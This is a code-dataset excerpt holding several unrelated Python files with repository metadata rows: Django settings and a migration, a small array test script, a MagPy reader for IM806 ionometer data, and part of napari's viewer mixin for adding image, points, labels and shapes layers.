    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'innova_aula.urls'
# Templates are looked up in the project-level 'templates' dir first,
# then inside each installed app (APP_DIRS=True).
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': ['templates'],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'innova_aula.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
# Development default: a file-based SQLite database next to manage.py.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
# Extra location (project-level 'static' dir) searched by collectstatic
# and the development server in addition to each app's static dir.
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, 'static'),
)
| 25.448 | 91 | 0.696636 |
# Django project settings (development defaults: DEBUG on, SQLite backend,
# project-level 'templates' and 'static' directories).
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# NOTE(review): secret key committed to source -- move to an env variable.
SECRET_KEY = 'h8v7g_j4o+j6p_7u8j8iagb)&4kl8x3=-^ebx*aad&ru^0%__r'
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'innova_aula.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': ['templates'],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'innova_aula.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, 'static'),
)
| true | true |
f723596d8116a6fa92775f0eada8876662613e44 | 322 | py | Python | authy/migrations/0005_remove_profile_url.py | RoyRasugu/Mygallery2.0 | 009a38e2affd669fcbe2512aec86578e72ab63a3 | [
"MIT"
] | null | null | null | authy/migrations/0005_remove_profile_url.py | RoyRasugu/Mygallery2.0 | 009a38e2affd669fcbe2512aec86578e72ab63a3 | [
"MIT"
] | null | null | null | authy/migrations/0005_remove_profile_url.py | RoyRasugu/Mygallery2.0 | 009a38e2affd669fcbe2512aec86578e72ab63a3 | [
"MIT"
] | null | null | null | # Generated by Django 2.2 on 2021-10-20 11:59
from django.db import migrations
class Migration(migrations.Migration):
    """Drop the unused ``url`` field from the ``profile`` model (authy app)."""
    # Must be applied after the previous authy migration.
    dependencies = [
        ('authy', '0004_auto_20211020_1442'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='profile',
            name='url',
        ),
    ]
| 17.888889 | 45 | 0.586957 |
from django.db import migrations
class Migration(migrations.Migration):
    """Remove ``profile.url`` from the authy app's schema."""
    dependencies = [
        ('authy', '0004_auto_20211020_1442'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='profile',
            name='url',
        ),
    ]
| true | true |
f7235a39a18cdf6f243e086a5d560268e5e7c2db | 75 | py | Python | Codeup/test.py | lkc263/Algorithm_Study_Python | 5b9a74ecf7e864c861df2280a1bf4b393b0fcbca | [
"MIT"
] | null | null | null | Codeup/test.py | lkc263/Algorithm_Study_Python | 5b9a74ecf7e864c861df2280a1bf4b393b0fcbca | [
"MIT"
] | null | null | null | Codeup/test.py | lkc263/Algorithm_Study_Python | 5b9a74ecf7e864c861df2280a1bf4b393b0fcbca | [
"MIT"
] | null | null | null | array = [[0 for col in range(11)] for row in range(10)]
print(len(array)) | 18.75 | 55 | 0.653333 | array = [[0 for col in range(11)] for row in range(10)]
print(len(array)) | true | true |
f7235dff2f70aa306bec24c5d32adb94d9b98bd4 | 4,036 | py | Python | magpy/lib/format_iono.py | geomagpy/magpy-git | 3f6fdff5b9d1954516876907b6c46f7192b8f2ea | [
"BSD-3-Clause"
] | 27 | 2016-02-29T21:46:40.000Z | 2022-02-11T23:43:20.000Z | magpy/lib/format_iono.py | geomagpy/magpy-git | 3f6fdff5b9d1954516876907b6c46f7192b8f2ea | [
"BSD-3-Clause"
] | 105 | 2016-05-10T06:39:32.000Z | 2022-03-30T13:10:39.000Z | magpy/lib/format_iono.py | geomagpy/magpy-git | 3f6fdff5b9d1954516876907b6c46f7192b8f2ea | [
"BSD-3-Clause"
] | 18 | 2016-09-13T06:57:48.000Z | 2022-02-09T09:49:14.000Z | """
MagPy
Input filter for IONOMETER data
Written by Roman Leonhardt December 2015
- contains test and read function, no write function
"""
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
from __future__ import division
from io import open
from magpy.stream import *
def isIONO(filename):
"""
Checks whether a file is IM806 format.
"""
try:
temp = open(filename, 'rt').readline()
except:
return False
try:
if not temp.startswith('Messdaten IM806'):
if not temp.startswith('Date;Time;NegMin;'):
return False
except:
return False
return True
def readIONO(filename, headonly, **kwargs):
    """
    Read IM806 IONOMETER data into a MagPy DataStream.

    Two export formats are supported and auto-detected from the header line:
    1. Text export  (header starting with 'Messdaten ...')
    2. FTP export   (default; header 'Date;Time;NegMin;...')

    Parameters
    ----------
    filename : str
        Path to the semicolon-separated IM806 file.
    headonly : bool
        If True, only header rows are parsed and data rows are skipped.
    **kwargs
        Optional 'debug' flag (read but currently unused).

    Returns
    -------
    DataStream
        Stream carrying the header dictionary and the parsed data ndarray.
    """
    debug = kwargs.get('debug')
    stream = DataStream()
    # Check whether header information is already present
    headers = {}
    # One value list per MagPy column key; column 0 holds the timestamps.
    array = [[] for key in KEYLIST]
    #qFile= file( filename, "rb" )
    # newline='' lets the csv module handle line endings itself.
    qFile= open( filename, "rt", newline='' )
    csvReader= csv.reader( qFile )
    # FTP export is assumed until a text-export header line is seen.
    fileformat = 'ftpexp' # 'fileexp'
    headers['SensorName'] = 'IM806'
    headers['SensorSerialNum'] = '12IM0183'
    # Running totals for the average row length (used to pad short rows).
    lensum, lencnt = 0,0
    for line in csvReader:
        elem = line[0].split(';')
        try:
            if elem[0].startswith('Messdaten'):
                # Text-export title row: extract sensor name and version.
                el = elem[0].split()
                headers['SensorName'] = el[1].strip()
                headers['DataStandardVersion'] = el[-1].strip()
                fileformat = 'fileexp'
            elif elem[0].strip().startswith('IM806'):
                # Serial-number row of the text export.
                el = elem[0].split()
                headers['SensorSerialNum'] = el[-1].strip()
            elif fileformat == 'fileexp' and elem[2] == 'Time':
                # Text-export column header: map columns to KEYLIST keys.
                for idx,el in enumerate(elem):
                    if idx > 2:
                        key = KEYLIST[idx-2]
                        headers['unit-col-'+key] = "N"
                        headers['col-'+key] = el.strip()
            elif fileformat == 'ftpexp' and elem[1] == 'Time' and elem[2] == 'NegMin':
                # FTP-export column header.
                for idx,el in enumerate(elem):
                    if idx > 1:
                        key = KEYLIST[idx-1]
                        headers['unit-col-'+key] = "N"
                        headers['col-'+key] = el.strip()
            elif fileformat == 'fileexp' and not headonly:
                # Text-export data row: columns 1/2 are date and time.
                array[0].append(date2num(datetime.strptime(elem[1]+'T'+elem[2],'%d.%m.%YT%H:%M:%S')))
                for idx,el in enumerate(elem):
                    if idx > 2:
                        ind = idx-2
                        array[ind].append(float(el))
            elif fileformat == 'ftpexp' and not headonly:
                array[0].append(date2num(datetime.strptime(elem[0]+'T'+elem[1],'%d.%m.%YT%H:%M:%S')))
                # Typical problem of last line -> missing elements -> pad with nan values
                lensum += len(elem)
                lencnt += 1
                avlen = int(np.round(lensum/lencnt))
                if not len(elem) == avlen:
                    elem = (elem + ['nan'] * avlen)[:avlen]
                for idx,el in enumerate(elem):
                    if idx > 1:
                        ind = idx-1
                        if el.strip() in [u'nan','']:
                            array[ind].append(np.nan)
                        elif ind > 7:
                            # Columns beyond index 7 are divided by 10
                            # (presumably fixed-point values in the file --
                            # TODO confirm against the IM806 export spec).
                            array[ind].append(float(el)/10.)
                        else:
                            array[ind].append(float(el))
        except:
            # Bare except: any malformed line is skipped with a notice only.
            print ("Importing of IM806 data failed")
    qFile.close()
    # Add some Sensor specific header information
    headers['SensorDescription'] = 'Ionometer IM806'
    headers['SensorID'] = '{}_{}_0001'.format(headers.get('SensorName','None'),headers.get('SensorSerialNum','12345'))
    array = [np.asarray(el) for el in array]
    return DataStream([LineStruct()], headers, np.asarray(array))
| 37.027523 | 118 | 0.519822 | from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
from __future__ import division
from io import open
from magpy.stream import *
def isIONO(filename):
    """Return True if *filename* looks like IM806 ionometer data
    (text export 'Messdaten IM806...' or FTP export 'Date;Time;NegMin;...')."""
    try:
        # NOTE(review): the handle returned by open() is never closed here.
        temp = open(filename, 'rt').readline()
    except:
        return False
    try:
        if not temp.startswith('Messdaten IM806'):
            if not temp.startswith('Date;Time;NegMin;'):
                return False
    except:
        return False
    return True
def readIONO(filename, headonly, **kwargs):
    """Read IM806 ionometer data (text or FTP export, auto-detected) into a
    MagPy DataStream. If *headonly* is True, data rows are skipped."""
    debug = kwargs.get('debug')
    stream = DataStream()
    headers = {}
    # One value list per MagPy column key; column 0 holds the timestamps.
    array = [[] for key in KEYLIST]
    qFile= open( filename, "rt", newline='' )
    csvReader= csv.reader( qFile )
    # FTP export is assumed until a text-export header line is seen.
    fileformat = 'ftpexp'
    headers['SensorName'] = 'IM806'
    headers['SensorSerialNum'] = '12IM0183'
    lensum, lencnt = 0,0
    for line in csvReader:
        elem = line[0].split(';')
        try:
            if elem[0].startswith('Messdaten'):
                el = elem[0].split()
                headers['SensorName'] = el[1].strip()
                headers['DataStandardVersion'] = el[-1].strip()
                fileformat = 'fileexp'
            elif elem[0].strip().startswith('IM806'):
                el = elem[0].split()
                headers['SensorSerialNum'] = el[-1].strip()
            elif fileformat == 'fileexp' and elem[2] == 'Time':
                for idx,el in enumerate(elem):
                    if idx > 2:
                        key = KEYLIST[idx-2]
                        headers['unit-col-'+key] = "N"
                        headers['col-'+key] = el.strip()
            elif fileformat == 'ftpexp' and elem[1] == 'Time' and elem[2] == 'NegMin':
                for idx,el in enumerate(elem):
                    if idx > 1:
                        key = KEYLIST[idx-1]
                        headers['unit-col-'+key] = "N"
                        headers['col-'+key] = el.strip()
            elif fileformat == 'fileexp' and not headonly:
                array[0].append(date2num(datetime.strptime(elem[1]+'T'+elem[2],'%d.%m.%YT%H:%M:%S')))
                for idx,el in enumerate(elem):
                    if idx > 2:
                        ind = idx-2
                        array[ind].append(float(el))
            elif fileformat == 'ftpexp' and not headonly:
                array[0].append(date2num(datetime.strptime(elem[0]+'T'+elem[1],'%d.%m.%YT%H:%M:%S')))
                # Pad rows shorter than the running-average length with 'nan'.
                lensum += len(elem)
                lencnt += 1
                avlen = int(np.round(lensum/lencnt))
                if not len(elem) == avlen:
                    elem = (elem + ['nan'] * avlen)[:avlen]
                for idx,el in enumerate(elem):
                    if idx > 1:
                        ind = idx-1
                        if el.strip() in [u'nan','']:
                            array[ind].append(np.nan)
                        elif ind > 7:
                            array[ind].append(float(el)/10.)
                        else:
                            array[ind].append(float(el))
        except:
            # Bare except: any malformed line is skipped with a notice only.
            print ("Importing of IM806 data failed")
    qFile.close()
    headers['SensorDescription'] = 'Ionometer IM806'
    headers['SensorID'] = '{}_{}_0001'.format(headers.get('SensorName','None'),headers.get('SensorSerialNum','12345'))
    array = [np.asarray(el) for el in array]
    return DataStream([LineStruct()], headers, np.asarray(array))
| true | true |
f7235eac6caeb862d193e06fce043ac5571e4468 | 28,932 | py | Python | napari/components/add_layers_mixin.py | ttung/napari | fa97a05b763dacc71d4c47e6b4b2a97c208e3551 | [
"BSD-3-Clause"
] | null | null | null | napari/components/add_layers_mixin.py | ttung/napari | fa97a05b763dacc71d4c47e6b4b2a97c208e3551 | [
"BSD-3-Clause"
] | null | null | null | napari/components/add_layers_mixin.py | ttung/napari | fa97a05b763dacc71d4c47e6b4b2a97c208e3551 | [
"BSD-3-Clause"
] | null | null | null | import itertools
import numpy as np
from .. import layers
from ..utils import colormaps
from ..utils.misc import ensure_iterable, is_iterable
from ..utils import io
class AddLayersMixin:
"""A mixin that adds add_* methods for adding layers to the ViewerModel.
Each method corresponds to adding one or more layers to the viewer.
Methods that just add a single layer contain the keyword arguments and
copies of the documentation from that the layer. These are copied and
pasted instead of being autogenerated because IDEs like PyCharm parse the
source code for docs instead of pulling it up dynamically.
These methods are separated into a mixin to keep the ViewerModel class
easier to read and make these methods easier to maintain.
"""
def add_layer(self, layer):
"""Add a layer to the viewer.
Parameters
----------
layer : napari.layers.Layer
Layer to add.
"""
layer.events.select.connect(self._update_active_layer)
layer.events.deselect.connect(self._update_active_layer)
layer.events.status.connect(self._update_status)
layer.events.help.connect(self._update_help)
layer.events.interactive.connect(self._update_interactive)
layer.events.cursor.connect(self._update_cursor)
layer.events.cursor_size.connect(self._update_cursor_size)
layer.events.data.connect(self._on_layers_change)
layer.dims.events.ndisplay.connect(self._on_layers_change)
layer.dims.events.order.connect(self._on_layers_change)
layer.dims.events.range.connect(self._on_layers_change)
self.layers.append(layer)
self._update_layers(layers=[layer])
if len(self.layers) == 1:
self.reset_view()
    def add_image(
        self,
        data=None,
        *,
        channel_axis=None,
        rgb=None,
        is_pyramid=None,
        colormap=None,
        contrast_limits=None,
        gamma=1,
        interpolation='nearest',
        rendering='mip',
        iso_threshold=0.5,
        attenuation=0.5,
        name=None,
        metadata=None,
        scale=None,
        translate=None,
        opacity=1,
        blending=None,
        visible=True,
        path=None,
    ):
        """Add an image layer to the layers list.
        Parameters
        ----------
        data : array or list of array
            Image data. Can be N dimensional. If the last dimension has length
            3 or 4 can be interpreted as RGB or RGBA if rgb is `True`. If a
            list and arrays are decreasing in shape then the data is treated as
            an image pyramid.
        channel_axis : int, optional
            Axis to expand image along. If given, one layer is created per
            index along this axis.
        rgb : bool
            Whether the image is RGB or RGBA. If not specified by user and
            the last dimension of the data has length 3 or 4 it will be set as
            `True`. If `False` the image is interpreted as a luminance image.
        is_pyramid : bool
            Whether the data is an image pyramid or not. Pyramid data is
            represented by a list of array like image data. If not specified by
            the user and if the data is a list of arrays that decrease in shape
            then it will be taken to be a pyramid. The first image in the list
            should be the largest.
        colormap : str, vispy.Color.Colormap, tuple, dict, list
            Colormaps to use for luminance images. If a string must be the name
            of a supported colormap from vispy or matplotlib. If a tuple the
            first value must be a string to assign as a name to a colormap and
            the second item must be a Colormap. If a dict the key must be a
            string to assign as a name to a colormap and the value must be a
            Colormap. If a list then must be same length as the axis that is
            being expanded as channels, and each colormap is applied to each
            new image layer.
        contrast_limits : list (2,)
            Color limits to be used for determining the colormap bounds for
            luminance images. If not passed is calculated as the min and max of
            the image. If list of lists then must be same length as the axis
            that is being expanded and then each colormap is applied to each
            image.
        gamma : list, float
            Gamma correction for determining colormap linearity. Defaults to 1.
            If a list then must be same length as the axis that is being
            expanded and then each entry in the list is applied to each image.
        interpolation : str
            Interpolation mode used by vispy. Must be one of our supported
            modes.
        rendering : str
            Rendering mode used by vispy. Must be one of our supported
            modes.
        iso_threshold : float
            Threshold for isosurface.
        attenuation : float
            Attenuation rate for attenuated maximum intensity projection.
        name : str
            Name of the layer.
        metadata : dict
            Layer metadata.
        scale : tuple of float
            Scale factors for the layer.
        translate : tuple of float
            Translation values for the layer.
        opacity : float
            Opacity of the layer visual, between 0.0 and 1.0.
        blending : str
            One of a list of preset blending modes that determines how RGB and
            alpha values of the layer visual get mixed. Allowed values are
            {'opaque', 'translucent', and 'additive'}.
        visible : bool
            Whether the layer visual is currently being displayed.
        path : str or list of str
            Path or list of paths to image data. Paths can be passed as strings
            or `pathlib.Path` instances.
        Returns
        -------
        layer : :class:`napari.layers.Image` or list
            The newly-created image layer or list of image layers.
        """
        # Exactly one of ``data`` and ``path`` must be supplied.
        if data is None and path is None:
            raise ValueError("One of either data or path must be provided")
        elif data is not None and path is not None:
            raise ValueError("Only one of data or path can be provided")
        elif data is None:
            data = io.magic_imread(path)
        if channel_axis is None:
            # Single (possibly RGB) image: build exactly one layer with
            # grayscale/translucent defaults.
            if colormap is None:
                colormap = 'gray'
            if blending is None:
                blending = 'translucent'
            layer = layers.Image(
                data,
                rgb=rgb,
                is_pyramid=is_pyramid,
                colormap=colormap,
                contrast_limits=contrast_limits,
                gamma=gamma,
                interpolation=interpolation,
                rendering=rendering,
                iso_threshold=iso_threshold,
                attenuation=attenuation,
                name=name,
                metadata=metadata,
                scale=scale,
                translate=translate,
                opacity=opacity,
                blending=blending,
                visible=visible,
            )
            self.add_layer(layer)
            return layer
        else:
            # Multichannel: split ``data`` along ``channel_axis`` into one
            # layer per channel (for pyramids, split every pyramid level).
            if is_pyramid:
                n_channels = data[0].shape[channel_axis]
            else:
                n_channels = data.shape[channel_axis]
            name = ensure_iterable(name)
            # Channels are composited, so default to additive blending.
            if blending is None:
                blending = 'additive'
            # Default colormaps: magenta/green for 1-2 channels, otherwise
            # cycle through the CYMRGB palette.
            if colormap is None:
                if n_channels < 3:
                    colormap = colormaps.MAGENTA_GREEN
                else:
                    colormap = itertools.cycle(colormaps.CYMRGB)
            else:
                colormap = ensure_iterable(colormap)
            # If one pair of clim values is passed then need to iterate them to
            # all layers.
            if contrast_limits is not None and not is_iterable(
                contrast_limits[0]
            ):
                contrast_limits = itertools.repeat(contrast_limits)
            else:
                contrast_limits = ensure_iterable(contrast_limits)
            gamma = ensure_iterable(gamma)
            layer_list = []
            zipped_args = zip(
                range(n_channels), colormap, contrast_limits, gamma, name
            )
            for i, cmap, clims, _gamma, name in zipped_args:
                if is_pyramid:
                    # Slice channel i out of every pyramid level.
                    image = [
                        np.take(data[j], i, axis=channel_axis)
                        for j in range(len(data))
                    ]
                else:
                    image = np.take(data, i, axis=channel_axis)
                layer = layers.Image(
                    image,
                    rgb=rgb,
                    colormap=cmap,
                    contrast_limits=clims,
                    gamma=_gamma,
                    interpolation=interpolation,
                    rendering=rendering,
                    name=name,
                    metadata=metadata,
                    scale=scale,
                    translate=translate,
                    opacity=opacity,
                    blending=blending,
                    visible=visible,
                )
                self.add_layer(layer)
                layer_list.append(layer)
            return layer_list
    def add_points(
        self,
        data=None,
        *,
        properties=None,
        symbol='o',
        size=10,
        edge_width=1,
        edge_color='black',
        edge_color_cycle=None,
        edge_colormap='viridis',
        edge_contrast_limits=None,
        face_color='white',
        face_color_cycle=None,
        face_colormap='viridis',
        face_contrast_limits=None,
        n_dimensional=False,
        name=None,
        metadata=None,
        scale=None,
        translate=None,
        opacity=1,
        blending='translucent',
        visible=True,
    ):
        """Add a points layer to the layers list.
        Parameters
        ----------
        data : array (N, D)
            Coordinates for N points in D dimensions. If None, an empty
            points layer is created matching the viewer dimensionality.
        properties : dict {str: array (N,)}, DataFrame
            Properties for each point. Each property should be an array of length N,
            where N is the number of points.
        symbol : str
            Symbol to be used for the point markers. Must be one of the
            following: arrow, clobber, cross, diamond, disc, hbar, ring,
            square, star, tailed_arrow, triangle_down, triangle_up, vbar, x.
        size : float, array
            Size of the point marker. If given as a scalar, all points are made
            the same size. If given as an array, size must be
            broadcastable to the same shape as the data.
        edge_width : float
            Width of the symbol edge in pixels.
        edge_color : str, array-like
            Color of the point marker border. Numeric color values should be RGB(A).
        edge_color_cycle : np.ndarray, list, cycle
            Cycle of colors (provided as RGBA) to map to edge_color if a
            categorical attribute is used to set face_color.
        edge_colormap : str, vispy.color.colormap.Colormap
            Colormap to set edge_color if a continuous attribute is used to set face_color.
            See vispy docs for details: http://vispy.org/color.html#vispy.color.Colormap
        edge_contrast_limits : None, (float, float)
            clims for mapping the property to a color map. These are the min and max value
            of the specified property that are mapped to 0 and 1, respectively.
            The default value is None. If set to None, the clims will be set to
            (property.min(), property.max())
        face_color : str, array-like
            Color of the point marker body. Numeric color values should be RGB(A).
        face_color_cycle : np.ndarray, list, cycle
            Cycle of colors (provided as RGBA) to map to face_color if a
            categorical attribute is used to set face_color.
        face_colormap : str, vispy.color.colormap.Colormap
            Colormap to set face_color if a continuous attribute is used to set face_color.
            See vispy docs for details: http://vispy.org/color.html#vispy.color.Colormap
        face_contrast_limits : None, (float, float)
            clims for mapping the property to a color map. These are the min and max value
            of the specified property that are mapped to 0 and 1, respectively.
            The default value is None. If set to None, the clims will be set to
            (property.min(), property.max())
        n_dimensional : bool
            If True, renders points not just in central plane but also in all
            n-dimensions according to specified point marker size.
        name : str
            Name of the layer.
        metadata : dict
            Layer metadata.
        scale : tuple of float
            Scale factors for the layer.
        translate : tuple of float
            Translation values for the layer.
        opacity : float
            Opacity of the layer visual, between 0.0 and 1.0.
        blending : str
            One of a list of preset blending modes that determines how RGB and
            alpha values of the layer visual get mixed. Allowed values are
            {'opaque', 'translucent', and 'additive'}.
        visible : bool
            Whether the layer visual is currently being displayed.
        Returns
        -------
        layer : :class:`napari.layers.Points`
            The newly-created points layer.
        Notes
        -----
        See vispy's marker visual docs for more details:
        http://api.vispy.org/en/latest/visuals.html#vispy.visuals.MarkersVisual
        """
        # Without data, create an empty (0, ndim) layer that matches the
        # viewer's current dimensionality (at least 2D).
        if data is None:
            ndim = max(self.dims.ndim, 2)
            data = np.empty([0, ndim])
        layer = layers.Points(
            data=data,
            properties=properties,
            symbol=symbol,
            size=size,
            edge_width=edge_width,
            edge_color=edge_color,
            edge_color_cycle=edge_color_cycle,
            edge_colormap=edge_colormap,
            edge_contrast_limits=edge_contrast_limits,
            face_color=face_color,
            face_color_cycle=face_color_cycle,
            face_colormap=face_colormap,
            face_contrast_limits=face_contrast_limits,
            n_dimensional=n_dimensional,
            name=name,
            metadata=metadata,
            scale=scale,
            translate=translate,
            opacity=opacity,
            blending=blending,
            visible=visible,
        )
        self.add_layer(layer)
        return layer
    def add_labels(
        self,
        data=None,
        *,
        is_pyramid=None,
        num_colors=50,
        seed=0.5,
        name=None,
        metadata=None,
        scale=None,
        translate=None,
        opacity=0.7,
        blending='translucent',
        visible=True,
        path=None,
    ):
        """Add a labels (or segmentation) layer to the layers list.
        An image-like layer where every pixel contains an integer ID
        corresponding to the region it belongs to.
        Parameters
        ----------
        data : array or list of array
            Labels data as an array or pyramid.
        is_pyramid : bool
            Whether the data is an image pyramid or not. Pyramid data is
            represented by a list of array like image data. If not specified by
            the user and if the data is a list of arrays that decrease in shape
            then it will be taken to be a pyramid. The first image in the list
            should be the largest.
        num_colors : int
            Number of unique colors to use in colormap.
        seed : float
            Seed for colormap random generator.
        name : str
            Name of the layer.
        metadata : dict
            Layer metadata.
        scale : tuple of float
            Scale factors for the layer.
        translate : tuple of float
            Translation values for the layer.
        opacity : float
            Opacity of the layer visual, between 0.0 and 1.0.
        blending : str
            One of a list of preset blending modes that determines how RGB and
            alpha values of the layer visual get mixed. Allowed values are
            {'opaque', 'translucent', and 'additive'}.
        visible : bool
            Whether the layer visual is currently being displayed.
        path : str or list of str
            Path or list of paths to image data. Paths can be passed as strings
            or `pathlib.Path` instances.
        Returns
        -------
        layer : :class:`napari.layers.Labels`
            The newly-created labels layer.
        """
        # Exactly one of ``data`` and ``path`` must be supplied (same
        # contract as ``add_image``).
        if data is None and path is None:
            raise ValueError("One of either data or path must be provided")
        elif data is not None and path is not None:
            raise ValueError("Only one of data or path can be provided")
        elif data is None:
            data = io.magic_imread(path)
        layer = layers.Labels(
            data,
            is_pyramid=is_pyramid,
            num_colors=num_colors,
            seed=seed,
            name=name,
            metadata=metadata,
            scale=scale,
            translate=translate,
            opacity=opacity,
            blending=blending,
            visible=visible,
        )
        self.add_layer(layer)
        return layer
    def add_shapes(
        self,
        data=None,
        *,
        shape_type='rectangle',
        edge_width=1,
        edge_color='black',
        face_color='white',
        z_index=0,
        name=None,
        metadata=None,
        scale=None,
        translate=None,
        opacity=0.7,
        blending='translucent',
        visible=True,
    ):
        """Add a shapes layer to the layers list.
        Parameters
        ----------
        data : list or array
            List of shape data, where each element is an (N, D) array of the
            N vertices of a shape in D dimensions. Can be an 3-dimensional
            array if each shape has the same number of vertices.
        shape_type : string or list
            String of shape shape_type, must be one of "{'line', 'rectangle',
            'ellipse', 'path', 'polygon'}". If a list is supplied it must be
            the same length as the length of `data` and each element will be
            applied to each shape otherwise the same value will be used for all
            shapes.
        edge_width : float or list
            Thickness of lines and edges. If a list is supplied it must be the
            same length as the length of `data` and each element will be
            applied to each shape otherwise the same value will be used for all
            shapes.
        edge_color : str or list
            If string can be any color name recognized by vispy or hex value if
            starting with `#`. If array-like must be 1-dimensional array with 3
            or 4 elements. If a list is supplied it must be the same length as
            the length of `data` and each element will be applied to each shape
            otherwise the same value will be used for all shapes.
        face_color : str or list
            If string can be any color name recognized by vispy or hex value if
            starting with `#`. If array-like must be 1-dimensional array with 3
            or 4 elements. If a list is supplied it must be the same length as
            the length of `data` and each element will be applied to each shape
            otherwise the same value will be used for all shapes.
        z_index : int or list
            Specifier of z order priority. Shapes with higher z order are
            displayed ontop of others. If a list is supplied it must be the
            same length as the length of `data` and each element will be
            applied to each shape otherwise the same value will be used for all
            shapes.
        name : str
            Name of the layer.
        metadata : dict
            Layer metadata.
        scale : tuple of float
            Scale factors for the layer.
        translate : tuple of float
            Translation values for the layer.
        opacity : float or list
            Opacity of the layer visual, between 0.0 and 1.0.
        blending : str
            One of a list of preset blending modes that determines how RGB and
            alpha values of the layer visual get mixed. Allowed values are
            {'opaque', 'translucent', and 'additive'}.
        visible : bool
            Whether the layer visual is currently being displayed.
        Returns
        -------
        layer : :class:`napari.layers.Shapes`
            The newly-created shapes layer.
        """
        # Without data, create an empty layer: zero shapes with zero
        # vertices each, matching the viewer dimensionality (at least 2D).
        if data is None:
            ndim = max(self.dims.ndim, 2)
            data = np.empty((0, 0, ndim))
        layer = layers.Shapes(
            data=data,
            shape_type=shape_type,
            edge_width=edge_width,
            edge_color=edge_color,
            face_color=face_color,
            z_index=z_index,
            name=name,
            metadata=metadata,
            scale=scale,
            translate=translate,
            opacity=opacity,
            blending=blending,
            visible=visible,
        )
        self.add_layer(layer)
        return layer
def add_surface(
self,
data,
*,
colormap='gray',
contrast_limits=None,
gamma=1,
name=None,
metadata=None,
scale=None,
translate=None,
opacity=1,
blending='translucent',
visible=True,
):
"""Add a surface layer to the layers list.
Parameters
----------
data : 3-tuple of array
The first element of the tuple is an (N, D) array of vertices of
mesh triangles. The second is an (M, 3) array of int of indices
of the mesh triangles. The third element is the (K0, ..., KL, N)
array of values used to color vertices where the additional L
dimensions are used to color the same mesh with different values.
colormap : str, vispy.Color.Colormap, tuple, dict
Colormap to use for luminance images. If a string must be the name
of a supported colormap from vispy or matplotlib. If a tuple the
first value must be a string to assign as a name to a colormap and
the second item must be a Colormap. If a dict the key must be a
string to assign as a name to a colormap and the value must be a
Colormap.
contrast_limits : list (2,)
Color limits to be used for determining the colormap bounds for
luminance images. If not passed is calculated as the min and max of
the image.
gamma : float
Gamma correction for determining colormap linearity. Defaults to 1.
name : str
Name of the layer.
metadata : dict
Layer metadata.
scale : tuple of float
Scale factors for the layer.
translate : tuple of float
Translation values for the layer.
opacity : float
Opacity of the layer visual, between 0.0 and 1.0.
blending : str
One of a list of preset blending modes that determines how RGB and
alpha values of the layer visual get mixed. Allowed values are
{'opaque', 'translucent', and 'additive'}.
visible : bool
Whether the layer visual is currently being displayed.
Returns
-------
